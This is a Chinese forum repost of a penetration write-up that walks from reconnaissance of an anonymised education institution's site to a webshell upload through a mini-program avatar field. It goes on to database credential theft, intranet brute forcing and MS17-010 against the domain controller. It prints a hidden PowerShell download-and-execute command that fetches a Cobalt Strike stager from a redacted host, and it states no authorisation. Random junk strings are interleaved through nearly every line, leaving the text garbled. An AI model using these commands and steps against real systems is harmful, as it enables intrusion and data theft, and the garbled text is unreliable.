|
$ a0 q" G& a3 @8 k 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
9 j1 c" l( l* S1 Q
" x: I9 ?3 n3 o4 U h+ P: W: N
# S3 {6 J; t, E% I" X! d" \5 g4 C1 U
9 _" a F9 j: L# @ Q& |& a# C" f6 t
1 I$ i8 Y* o, d7 e5 r
正文
) U9 o* |! c+ D" B! J% n0 n
- d+ e( _$ X/ S0 a. L5 c* @
& _, n' S @$ o9 s4 k+ R, i
( x9 N. ?& _$ L" d1 a
9 n" ?- D" I0 k# v, a
7 u- G6 F/ j8 K- H `1 Y% u 目标:www.xxxx.com(一家教育机构)
* U- T4 n3 o- |$ e* _$ Q9 I打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能0 f+ G P+ |! y; B+ J) p
5 T/ n* p4 |2 { @9 {3 l
2 M. C# w* [2 B" _, I4 D* K. |
) K6 a* l6 o7 `( G+ D( c% Q
5 V( c; m% R6 ^4 i0 m: x0 I2 ~
; t" o$ ~8 |- }0 `2 D 进行了简单的信息搜集
' P6 r- n, ?- X; i2 l$ G/ _
2 p; s! |; ~( P8 `4 M- y$ N, \3 _
0 V z/ C# T- [* b2 p
# ^. r+ L; F. c' e! d/ m1 ^) U6 ?7 I6 T' p! i! b
子域名搜集
5 L' j- Y. {6 d3 A2 u+ [ ' z& @* ^- P. K0 Z4 H) O8 C
" Z# a' t; w; X+ u
 % X V g# Q& v% d2 l' d
! d- t2 X6 D4 Y' r6 M; c, z1 y$ K, i+ Y. Z3 y# q
fofa找资产
" d/ j6 ]" P* o/ f7 z* F
* {7 h8 \7 y- R* Z! E! t; y7 g& `9 V3 P. y
% T# m: B$ K) O( j; {: r1 i. i
$ G2 s- L7 _- O% \: J
 ; R. d p: o9 Y* [8 w1 A! Q4 g& a
& w+ H1 |; \0 a
1 N) e4 ~3 a1 _( h: W4 w
一共七个资产。去重之后只有两个。
% u0 Z. P" y: S6 l2 ~) V
& P2 k0 [# a4 i. r
! E$ i" E4 N( B( Q3 }' u / T! u+ p- O# r7 i6 r
# e/ Y( x- f% w4 j 目录探测
9 ~% a$ N8 J/ n& r6 I) g - x1 L- P/ v9 A# `# l7 s
( X2 |1 X! w% E5 {6 K' t+ p
# d. g* Z9 V @4 O0 e' E' L6 O3 y" N
4 r1 i: F0 ^% m* W! A0 c+ ^$ F% R: p2 k5 v
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
$ L; k; F* C1 T: i
/ w3 i l; a' j7 F# O9 ~
: K/ i- d& i' P . P1 h5 d7 X- i; ]) C
; Y1 m, K( H2 Q) }6 _6 b 我又尝试了通过修改返回包来绕过登录界面
4 ]4 r1 P3 S* [) ~& q+ t 2 t7 s( c9 G3 e/ T
: ~- F5 l: \, k& \
 + b. P0 P& D8 B
' t+ ~. w/ V' ?
: c1 t% k- V! L3 b4 | 还是不行,尝试注入无果8 @% b6 z4 k+ s
2 B4 ^' D( H4 }
4 x0 o! W$ h& ~' _0 o5 K0 ^" o
0 R k9 f# P! r8 q1 V( L% O7 H & x a( q. M1 s# c
k* M- d7 D2 V: r2 D
不过我目录探测出了一处Spring信息泄露
! ^. m# G+ v; R* C! H3 y z, y& i
3 @* N& D2 u2 i
+ V) ~- [2 b L- s) h* k8 J
, M" L: P1 K6 v6 l/ B: X7 f4 o
. j) x f- C: j: h9 V 
! ~; _) a* T, q! [+ b# c" d' L
0 l2 j+ \# F. j5 G! L# |5 F' I6 x
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
, Y" F) ^, L \) a# C' p
9 S' t( M. Z" T9 V/ v H5 @+ N! I8 L; x6 n8 ]# c
) }8 k% ^! R# u' M
, ]& ^ s& q+ |$ d
# b/ \& s3 w, n4 I" L, T 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
- m5 q# R9 E3 V* q" ` * [- V' {3 U2 R2 N
$ \6 d, @; }( X# h, E$ E5 r 
5 q2 n* R: K$ p2 \ ' C9 z* |# `+ ~; A: f; ?
F$ x0 w" d/ f& ]8 X
获取有些师傅到这一步就手机抓包电脑测了。
; V3 q) ^$ }0 K; o' O
" l* D6 ]- s$ V. M9 J9 i% K$ S# x% y& b* a9 w; ?3 J* H
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
) a' K! t2 N2 `3 E+ t2 v 5 K1 Z* p* Q1 w! Z1 x5 ~
5 r7 b8 n; Y! K; q! Y& \$ D 其中在一个公众号发现了小程序,可以进行注册。6 Y6 F8 a$ x' x4 S( V4 N& Y
9 E3 H; M8 q& Q
8 U: f7 V* R7 P- v0 A 看到了头像上传,尝试上传获取WebShell. Z8 s1 x5 F2 p: A- ?' q
: h3 x+ O/ h1 Z2 L0 V9 g" k$ f- _
% i; |) c+ S; w. F1 j
 5 ]/ O4 S# M; H
1 \( h# ]) N1 O( ~- }8 ?
# P2 Y7 z0 \) o+ A7 ]9 U& s1 ` 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问9 J7 K# B/ |) T. @
- r7 ^8 X9 ]9 ]2 }2 ? p' ` n5 O: H' v5 v I2 _3 G' `
' w" R$ ]9 }( T + F4 Y7 h$ Q5 @) d
2 r: Z4 N! B$ M1 ]* T5 ]: A 然后上了大马
) D0 E$ t2 }, B8 \! [; W- e- V
& G' x' M* Q5 `$ W) \) o- [# j7 m0 ^+ s9 i3 w
 ; D2 C& O7 \; Q* k3 Q% D2 u
9 U5 T3 d% {* l" z
' w z& l1 X! u- J3 p+ K) S  & x* U5 w' A% k# h5 P+ v
9 p2 i t7 {; s5 G0 z
' i& d: m9 f$ [9 ? 通过翻找文件发现数据库账号密码# g. I8 o8 K# M0 Y) j3 ?
! A, h) o4 m, Y) [; r! U6 @- z2 y" L' K+ I; g
$ I! ~0 a, s+ }1 p: X6 C* _
* q% l) \& u2 I) l* A0 C9 u7 u# J) l$ e1 V
--内网渗透1 e% n; ^4 L, Y0 i2 b8 `6 w
8 b1 r( w' S( x4 u2 H3 `
* h2 H7 j5 d: y* k" d/ C2 R8 N" C 直接通过powershell执行 cs上线
3 y$ o! I9 F8 y * O* {% V* q' j! P S
! |, Y/ ^/ |; ?9 _$ i0 U( h2 v
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
# l8 b( J0 k% N0 U8 S3 z' ~
; T0 T/ h$ [, J- z' g& T* g) q1 a( c4 ?; }! j
; {3 b/ H& p. b$ s% u/ U: Q4 V. [: D1 y , o& f: _' \7 r8 k4 n0 G
& T0 ?6 D$ H9 G$ @8 o* ^
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
& \; e3 e F1 J) S* o ; O( ^: [5 b7 S' z; e
1 X7 F6 X( B3 O& Z7 \3 [  ! f3 A6 T- l9 E5 S
$ v" D4 ]6 N: t8 {& {, G, Z3 U$ O6 B! b/ {0 G
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
; L6 \" e5 b h7 j6 f9 b
0 R: ?8 s' a( g
9 D" t6 W, T# J; H' n7 ?6 k1 F6 _4 w; M7 x- m7 v7 c r4 g/ Q0 c# s
4 o- F, ~5 |% h$ g. s; V! E! Q. d
D; f/ c5 w: e' [, c1 a  & h! `+ r# b; @. i- W2 g$ i$ k& Z
; [2 u' T! N/ B( ~5 x
) R1 ]5 B6 E, c: e6 W% A& ^ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
" ^. x, ~- r; b9 y* m
1 Z) V$ g- r. l) K1 O, \& b
2 L" b- a$ |8 O; _" K; D
. _( s& A+ y7 ^. u" y$ O8 W0 p( M$ o( N, X: T* B
" h1 _$ h1 Q8 c9 P) H / C- G* [( L, Q: k; @
6 ]7 d/ L5 L6 C& x! W+ [! m
* Y# a* c2 j& w8 O1 s( S
3 ~. D1 `+ |; @
; J- d$ [7 N2 E
7 [( e) e% o1 U/ }' A$ i
9 i2 Z7 R, `& ?
9 Q/ |: G- h0 H- @6 a2 M* ? # ]; y+ _. D2 y1 M( y4 b0 u
7 `' t X; L* T: T. V/ f
小结
( |) N5 C4 X1 L# g. r
, M: m" `6 J3 {% r' v* ?5 E7 H1 E$ |# i
1 I- K$ R2 Z6 b
3 z+ d$ R# a) }' T* N, _& W' \! \) r# g
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
' [: T3 z4 b" E) T7 e% H " u/ i7 s3 z4 R% K, f; k
% q) I' W9 Q& h7 u
9 A I2 }# B. ~( k$ ?# P P " L# |& B& ~/ X
9 h- D. x$ s9 }/ D* H6 k# P( `8 y - 1 _* ?9 t5 w2 D( k5 r- n8 H
1 E) P+ T! ?; W
8 ]3 `7 r" @. h5 ]( g0 z% B$ c
-
9 V: h3 o2 D9 P" F. E5 { 3 X* _/ N# t* v4 ?
/ o9 a- {* e& |
+ x! d* ~! `( e" W$ H1 i: D* [$ M
" G! C+ t4 c5 }$ X' S) h0 _ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
+ Z5 \6 V7 x; K( t0 f8 W% W( E: D : P$ z1 a& B$ D' ]8 W8 z3 F/ \
0 W- q% {- p; Y. \
- E: d3 X0 [0 Y | 
发表于 2024-3-1 19:41:32
收藏
支持
反对